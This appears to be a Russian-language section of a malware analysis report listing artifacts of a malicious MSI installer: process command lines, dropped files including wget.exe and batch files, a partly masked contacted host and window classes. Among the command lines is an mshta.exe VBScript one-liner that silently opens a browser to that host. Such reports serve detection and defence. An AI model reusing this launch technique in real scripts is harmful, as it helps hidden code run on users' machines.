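Техническая информация
Ниже приведены артефакты, перечисленные без подзаголовков: командные строки процессов, пути к файлам, сетевые адреса с DNS-запросом и классы окон. Символы «#» в адресах, по-видимому, маскируют часть имени узла и параметров запроса. Некоторые пути к файлам повторяются; вероятно, они относились к разным подразделам, названия которых здесь не сохранились.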
- '<SYSTEM32>\msiexec.exe' /V
- '<SYSTEM32>\msiexec.exe' -Embedding 24B2E1865FE9F8BAD957DF3491D40F1B
- '<SYSTEM32>\msiexec.exe' /i c:\MSDOC.msi
- '<SYSTEM32>\mshta.exe' vbscript:createobject("wscript.shell").run("""iexplore""http://cn##.sjt8.com/info.access/?st######",0)(window.close)
- '%PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE' http://cn##.sjt8.com/info.access/?st######
- %WINDIR%\Installer\25aa9.msi
- %TEMP%\24b86.msi
- C:\MSDOC.msi
- %TEMP%\MSI24b87.LOG
- %WINDIR%\Installer\MSI3.tmp
- %WINDIR%\Installer\MSI2.tmp
- <LS_APPDATA>\exe1.ini
- <LS_APPDATA>\cmd.exe
- %TEMP%\~1.bat
- <LS_APPDATA>\wget.exe
- <LS_APPDATA>\hta.ini
- <LS_APPDATA>\exe2.ini
- %TEMP%\~1.bat
- %WINDIR%\Installer\MSI3.tmp
- %WINDIR%\Installer\MSI2.tmp
- 'cn##.sjt8.com':80
- 'localhost':1038
- cn##.sjt8.com/info.access/?st######
- DNS ASK cn##.sjt8.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''